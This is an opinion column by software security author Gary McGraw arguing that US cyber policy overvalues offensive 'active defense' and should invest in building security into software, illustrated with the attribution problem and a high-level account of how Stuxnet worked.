In cyberwar, having a good offense is not the same as having a good defense. It is much more dangerous. The current call to cyber-arms permeating Washington is a serious problem. The purveyors of cyber-offense and "active defense" seem to not understand the role that proactive defense through security engineering can play in averting cyberwar.
Cyber-information systems control many important aspects of modern society, from power grids, to transportation systems, to essential financial services. They sample air quality, spy on people, track movement of fissile materials, enable remote-controlled bombing, manage hardware and software supply chains, facilitate billions of dollars in fraud each year, form the core of massive botnets that can take giant corporations offline, predict weather events, and allow split-second financial trades that move world markets. Our dependence on these systems and their inherent complexity and interrelated nature is not well-understood by the "non-geeks" who make both policy and business decisions. This makes for a real and present danger of cyber-exploit. That's because a majority of these essential systems are riddled with security vulnerabilities.
As such, our reliance on these vulnerable systems is a major factor making cyberwar inevitable. The cyber-environment is target-rich and easy to attack, and even weak actors can have a major asymmetric impact. Billions invested in detective and reactive controls do not seem to have measurably improved our national application portfolio or hardened our national attack surface. The only viable solution to this problem is to improve our cyber-defenses proactively by greatly increasing our appetite for, and ability to design and implement secure software.
Offense masquerading as 'active defense'
When the Washington Post publishes a story hyping an ill-considered notion of cyber-retaliation misleadingly called "active defense" as a rational idea, we should all worry.
Active defense is normally a fairly innocuous and well-understood military term that refers to efforts to thwart an attack by attacking the attackers. In this nomenclature, "passive defense" would be protection through proactive security engineering. Strangely, this notion of passive defense (or protection) is completely ignored in the cyberwar debate. This is surprising, because proactive defense can serve as a differentiator and a serious deterrent to war.
Protection can make you stronger. In some sense, U.S. cyber-strategists are like the ancient Greeks who went into battles without any protective shields. Why would anybody do that when from a survivability point of view it seems so absurd?
National security reporter Ellen Nakashima's story on Sept. 16 described recently retired FBI cyber-lawyer Steven Chabinsky's frustration with government's overly bureaucratic approach to cybersecurity through checklists (think FISMA). Unfortunately, Chabinsky's misguided answer is to "enable companies whose computer networks are targeted by criminals and foreign intelligence services to detect who's penetrating their systems and to take more aggressive action to defend themselves." Worse yet, Nakashima reported that former CIA director Michael Hayden "has said that given the limits of the government in protecting companies in cyberspace, he expects to see the emergence of a 'digital Blackwater,' or firms that hire themselves out to strike back at online intruders." For the record, firms like this already exist and are active.
Secretary of Defense Leon Panetta's recent October 2012 speech about cyberwar added a new and even more dangerous twist to the notion of active defense. Panetta specifically extended the notion of offensive action to include preemptive attacks (though he did not specify whether such attacks would be exclusively cyber) when he said, "We need to have the option to take action against those who would attack us."
The implications of Panetta's thinking are even more dangerous than the original active defense concept floated by Chabinsky in Nakashima's article. Knowing where this thinking is all coming from is entirely relevant. Chabinsky works for a new "cybersecurity" company called CrowdStrike, founded by former McAfee CTO George Kurtz. They describe themselves as a "team of visionaries, rebels who believe the current state of security is fundamentally broken and want to do something about it. More importantly, these are the patriots who are tired of seeing our intellectual property and competitive advantage wiped away under the thinly veiled cover of an Internet address."
The hairy, unsolved problem in the room here is attribution. Simply put, it's difficult to know with any certainty where a cyberattack may have originated.
Bilbo Baggins, attribution and cyber-escalation
In a famous scene from Tolkien's book The Hobbit, the protagonist Bilbo Baggins, his dwarf travelling companions, and Gandalf the wizard are confronted by three trolls. The scene unfolds as follows:
Bilbo, in an ill-fated robbery attempt (his first act as "burglar"), is captured by three trolls. The dwarves are attracted to the same clearing by the noise of a fight between the trolls over what to do about Bilbo. The trolls stop fighting long enough to capture the dwarves in sacks as they approach. The trolls plan to cook the dwarves immediately, but a voice -- which sounds exactly like one of the trolls -- starts an argument and the trolls begin fighting again. The trolls fight long enough that the sun rises and the trolls immediately turn to stone. Gandalf had been throwing his voice to keep the fighting and arguing among the trolls going until the sun came up.
The question at hand is how the trolls might have determined that it was Gandalf and not each other (and the dwarves) that was causing and then prolonging their fight? The answer, of course, is that the trolls had no way of figuring that out.
We have exactly the same problem on the Internet today. The source of an attack is often very difficult to determine. This is called the problem of attribution, and it has been carefully studied.
Given an active defense position such as the one championed by Steven Chabinsky, it is easy to see how a "Gandalf" could cause no end of trouble by keeping the trolls (nation states) engaged in a fight.
Kurtz and company think about solving the attribution problem in this way: "By identifying the adversary and revealing their unique TTPs (i.e., modus operandi), we can hit them where it counts -- at the human dependent -- and not easily scalable parts of their operations." Are we witnessing the emergence of a cyber-Oliver North?
Cyber-offense technically easy (and environment target-rich)
Perhaps the real purpose behind active defense is to act as deterrence. But is a strong offense a real deterrent? What is critical to understand is that developing offensive capabilities does nothing to prevent others from doing so. Empowering the military to launch a cyberattack (either reactive or preemptive) doesn't prevent cyberwar nor does it disincentivize other countries from being first movers in a cyberwar. Even in the case of verifiable attribution and controlled proliferation, it is not clear how a purely cyber preemptive or retaliatory strike would incapacitate the target's offensive cyber-capabilities.
In the United States, our cyber-weapons are just as advanced as our war-fighting drones. Operation Olympic Games, which deployed Stuxnet against the Iranian nuclear refinement program, showed just how far cyber-offense capability has come. The real question is, "Who else can develop this kind of capability?"
From a technical perspective, Stuxnet provides a prime example of a cyberweapon and is interesting not only because of its impact, but because of the relative simplicity of its attack payload. The problem is that Stuxnet hype oversold the capabilities required to create an effective cyberweapon. Hyperbole about Stuxnet may lead non-technical policy makers to assume that relatively weak actors will not be able to participate in offensive cyberwar. That is wrong.
Unfortunately, modern systems are so riddled with security vulnerabilities that carrying out a spectacular attack is relatively easy. Studies show that on average every day there are thousands of exploitable vulnerabilities not yet made public or patched. These so-called zero-day vulnerabilities are actively exploited every day by attackers around the world.
Some technical background information about Stuxnet can help make this clear. Stuxnet is in essence a stealthy control system that can be used to disrupt a physical process under the control of a particular Siemens process-control system. Stuxnet does most of its real dirty work (after installing itself and hiding itself from detection) by injecting some code into the running system (a DLL called s7otbxdx.dll). This classic "DLL injection/interposition attack" is used to manipulate data flow between the programmable logic controller (PLC) and the SIMATIC control systems. Think of this as an "attacker in the middle" scenario where the injected code sees and can manipulate all traffic passed between the PLC and the control systems. German analyst Ralph Langner explained what the rogue DLL does by referencing its decompiled code. See Langner's book Robust Control Systems Networks. Basically, the code ensures it is running on a valid PLC target (making various probes of specific words in memory, checking CPU type and control process type, and identifying individual targeted controllers). If it has acquired a target, it injects code directly into the PLC's Ladder Logic (LL). This is the code that directly impacts a physical process. In a personal communication, Langner said, "There are actually two distinct payloads, and only the smaller, less-complex one manipulates the centrifuge drive speed and uses OB35 (it also uses OB1). The code injection in OB35 simply was the first hard forensic evidence we gathered in decompiling wire traffic sent from the dropper to the controller."
In essence, the LL code can be used to disrupt a physical process.In another personal communication, Langner said: "In a nutshell, the attackers manipulate the centrifuge drive system and the cascade protection system in ways that cause rotor trouble, which the Iranian operators then attribute to mechanical failure or incompetence. In order to do that, the attackers used in-depth knowledge about those IR-1 gas centrifuges and a complete mockup for destructive testing. According to our recent analysis, they most likely even had their mockup filled with real uranium hexafluoride because two of the three distinct attacks involved process gas. The big thing that most people don't understand is that all this sophistication is not required for copycat attacks because it was only used to disguise the cyberattack [emphasis mine]. When an attacker is not interested in disguise, they don't need to put in all that sophistication. Now imagine you're a terrorist or a criminal who intends to extort a power utility; disguise would actually be counterproductive in such scenarios. They want the target to know they are under cyberattack, and they don't even intend to hide the origin of the attack."
To bring this all home, imagine the timer controlling the spin velocity of a centrifuge working incorrectly. Centrifuge systems require careful balance and exacting technical control when used to enrich uranium. Stuxnet intentionally sabotaged this control, resulting in the destruction or disabling of thousands of centrifuge units. Though the delivery mechanism for Stuxnet involved a number of previously unknown zero-day vulnerabilities, stolen crypto credentials, and other arcana, the action part of the payload itself was not very technically sophisticated. DLL inter-positioning of the type explained above was well known in 1997, is easy to carry out, and is so elementary that it does not even work as an attack against today's online gaming systems.
Put another way, most modern control systems are so poorly designed from a security perspective that they are vulnerable to attacks devised over fifteen years ago. Creating a cyber-payload is not rocket science. Unfortunately, neither is getting that payload to an intended target as evidenced by the myriad reports of USB stick misuse, connecting personal devices to corporate and even classified networks, and so on.
Cyber-rocks are cheap and everyone can buy them
Compounding the "ease of exploit" problem is the fact that developing a cyber-offense capability is fairly cheap. Listing some relative costs can help make this clear. (All of these estimates are provided by Ralph Langner in his talk, Cyber Warfare: Preparing for the Inevitable.) A nuclear sub fleet costs on the order of $90 billion to develop. A stealth fighter program costs $40 billion. The Eurojet fighter and the Leopard II tank fleet run $10 billion. Contrast these price tags with the costs associated with cyberwarfare systems. A cyberweapons program aimed at hardened military targets may cost $1 billion (an order of magnitude less than the weapons systems listed above). But more telling is the relatively tiny $100 million price tag for a cyberweapons program targeting essential civilian systems. Even more worrisome is the estimated $5 million it might cost to craft a single-use attack against critical infrastructure to use in terrorism.
Put simply, the relatively small costs of cyberweaponry puts them well within reach of the 70 countries with defense budgets over $1 billion, not to mention the 20 countries who spend over $10 billion. Even loosely affiliated terrorist groups can raise $5 million.
Creating a cyber-rock is cheap. Buying a cyber-rock is even cheaper since zero-day attacks exist on the open market for sale to the highest bidder. In fact, if the bad guy is willing to invest time rather than dollars and become an insider, cyber-rocks may in fact be free of charge, but that is a topic for another time.
Given these price tags, it is safe to assume that some nations have already developed a collection of cyber-rocks, and that many other nations will develop a handful of specialized cyber-rocks (e.g., as an extension of many-year-old regional conflicts). If we follow the advice of Hayden and Chabinsky, we may even distribute cyber-rocks to private corporations.
Obviously, active defense is folly if all it means is unleashing the cyber-rocks from inside of our glass houses since everyone can or will have cyber-rocks. Even worse, unlike very high explosives, or nuclear materials, or other easily trackable munitions (part of whose deterrence value lies in others knowing about them), no one will ever know just how many or what kind of cyber-rocks a particular group actually has.
Offense is sexier than defense
Now that we have established that cyber-offense is relatively easy and can be accomplished on the cheap, we can see why reliance on offense alone is inadvisable. What are we going to do to stop cyberwar from starting in the first place? The good news is that war has both defensive and offensive aspects, and understanding this fundamental dynamic is central to understanding cyberwar and deterrence.
The kind of defense I advocate (called "passive defense" or "protection" above) involves security engineering -- building security in as we create our systems, knowing full well that they will be attacked in the future. One of the problems to overcome is that exploits are sexy and engineering is, well, not so sexy.
I've experienced this first hand with my own books. The black hat "bad guy" books, such as Exploiting Software, outsell the white hat "good guy" books like Software Security by a ratio of 3:1. I attribute this to the NASCAR effect. The NASCAR effect causes shortsighted pundits to focus on offense, which is sexy, to the detriment of defense, which is engineering. Nobody watches NASCAR racing to see cars driving around in circles. The people in the stands (as opposed to drivers, owners and insurance companies) watch for the crashes. People prefer to see, film, and talk about crashes more than to learn about building safer cars. There is a reason why there is no Volvo car safety channel on television, even when there are so many NASCAR-like channels.
This same phenomenon happens in cybersecurity. In my experience, people would rather talk about cyberwar, software exploit, digital catastrophe and shadowy cyber-warriors than talk about security engineering, proper coding, protecting supply chains and building security in. It's much sexier to talk about cyber-offense and its impacts than to focus on defense and building things right in the first place.
To be fair, it takes real engineering to build good, robust, targeted, reliable offensive cyberweapons. Part of my point is that no such rocket science is required given the state of software security today.
Proactive defense versus reactive defense
We've established that offense, even in the guise of active defense is a poor deterrent. If everyone has cyber-rocks and attribution is difficult, a cyber-troublemaker can start a real war using Gandalf's trick. What are we to turn to as a deterrent or a power differentiator?
The answer is clear: cyber-defense.
Sadly, all cyber-defense is not created equal. A misunderstanding about different kinds of defense can lead to an incorrect approach and a false sense of security. As I established above, the U.S. has developed formidable cyber-offenses. Yet its cyber-defenses remain weak. What passes for cyber-defense today -- actively watching for intrusions, blocking attacks with network technologies such as firewalls, law enforcement activities, and protecting against malicious software with antivirus technology -- is little more than a cardboard shield. This reactive defense relies on monitoring our broken systems and keeping an eagle eye out for attacks to respond to. When Defense Secretary Leon Panetta said: "Through the innovative efforts of our cyber-operators, we are enhancing the department's cyber-defense programs. These systems rely on sensors and software to hunt down malicious code before it harms our systems. We actively share our own experience defending our systems with those running the nation's critical private-sector networks," he is talking about the wrong kind of defense.
Simply put, the U.S. has neglected its proactive cyber-defenses because strengthening them is a painstaking and unglamorous task. Because of the NASCAR effect, emphasizing cyber-offense and reactive defense attracts more attention and funding than a more prosaic focus on proactive defense and building security into software at the outset. Ultimately, a balanced approach to cybersecurity requires offense, reactive defense, and proactive defense in more equal measures.
Software security is a relatively new discipline that takes on the challenge of building security in, and has seen real success among actively engaged and forward thinking corporations. In general, software security progress is more advanced among private corporations (including multi-national banks and independent software vendors) than in the public sector, which lags years behind. For real data, see the BSIMM.
The only way to address the cybersecurity problem and slow the accelerating slide into cyberwar is to build security into our modern systems when they are created.
Proactive defense as a differentiator
Assuming that cyberwar is inevitable, or even desirable, the case for building security in can also be presented as a means to achieving "superiority" in cyberspace. This is relevant because in the cyber-domain, the advantage of striking first is not exactly clear. It is evident that whoever strikes first can expect retaliation, since it is exceptionally difficult to incapacitate another country's offensive cyber-capabilities permanently (and it is neither difficult nor expensive to conduct a retaliatory strike, even if it is only symbolic, and even if it must be done from some other country's networks). Therefore, no matter how much is spent on cyber-offense, cyber-defense must be addressed anyway. The conclusion to this line of thinking also leads directly to building security in.
Interestingly, the U.S. is in a good position to outspend its adversaries on proactive defense. Proactive defense can be our differentiator and a serious deterrent to war.
Cybersecurity policy must focus on solving the software security problem -- fixing our broken systems first. We must refocus our energy on addressing the glass house problem instead of focusing on building faster, more accurate rocks to throw. We must identify, understand and mitigate computer-related risks. We must begin to solve the software security problem.
Acknowledgements
Thanks to Sammy Migues (Cigital), Ralph Langner (Langner Communications), Ivan Arce (Fundacion Sadosky) and Thomas Rid (King's College London) for insightful comments on an early draft.
About the author
Gary McGraw, Ph.D., is CTO of Cigital Inc. a software security consulting firm. He is a globally recognized authority on software security and the author of eight bestselling books on this topic. Send feedback on this column to editor@searchsecurity.com.